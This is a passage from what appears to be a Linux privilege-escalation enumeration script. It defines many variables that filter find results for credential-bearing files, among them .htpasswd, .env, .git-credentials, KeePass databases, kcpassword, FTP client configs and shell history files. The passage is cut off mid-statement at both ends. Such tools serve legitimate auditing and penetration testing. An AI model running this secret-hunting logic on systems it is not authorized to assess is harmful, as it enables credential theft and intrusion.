"^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "postfix$" | sort | uniq | head -n 70)
PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.cloudflared$" | sort | uniq | head -n 70)
PSTORAGE_HISTORY=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) PSTORAGE_HISTORY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70)
PSTORAGE_HTTP_CONF=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) PSTORAGE_HTTP_CONF=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "httpd\.conf$" | sort | uniq | head -n 70)
PSTORAGE_HTPASSWD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) PSTORAGE_HTPASSWD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.htpasswd$" | sort | uniq | head -n 70)
PSTORAGE_LDAPRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) PSTORAGE_LDAPRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.ldaprc$" | sort | uniq | head -n 70)
PSTORAGE_ENV=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.env$" | sort | uniq | head -n 70) PSTORAGE_ENV=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.env$" | sort | uniq | head -n 70)
PSTORAGE_MSMTPRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) PSTORAGE_MSMTPRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.msmtprc$" | sort | uniq | head -n 70)
PSTORAGE_INFLUXDB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) PSTORAGE_INFLUXDB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70)
PSTORAGE_ZABBIX=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) PSTORAGE_ZABBIX=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70)
PSTORAGE_GITHUB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) PSTORAGE_GITHUB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70)
PSTORAGE_SVN=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.svn$" | sort | uniq | head -n 70) PSTORAGE_SVN=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.svn$" | sort | uniq | head -n 70)
PSTORAGE_KEEPASS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) PSTORAGE_KEEPASS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70)
PSTORAGE_FTP=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) PSTORAGE_FTP=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70)
PSTORAGE_BIND=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/var|^/usr|^/etc" | grep -E "bind$" | sort | uniq | head -n 70) PSTORAGE_BIND=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/etc|^/usr|^/var" | grep -E "bind$" | sort | uniq | head -n 70)
PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "seeddms.*$" | sort | uniq | head -n 70) PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "seeddms.*$" | sort | uniq | head -n 70)
PSTORAGE_DDCLIENT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) PSTORAGE_DDCLIENT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70)
PSTORAGE_KCPASSWORD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "kcpassword$" | sort | uniq | head -n 70) PSTORAGE_KCPASSWORD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "kcpassword$" | sort | uniq | head -n 70)
PSTORAGE_SENTRY=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E 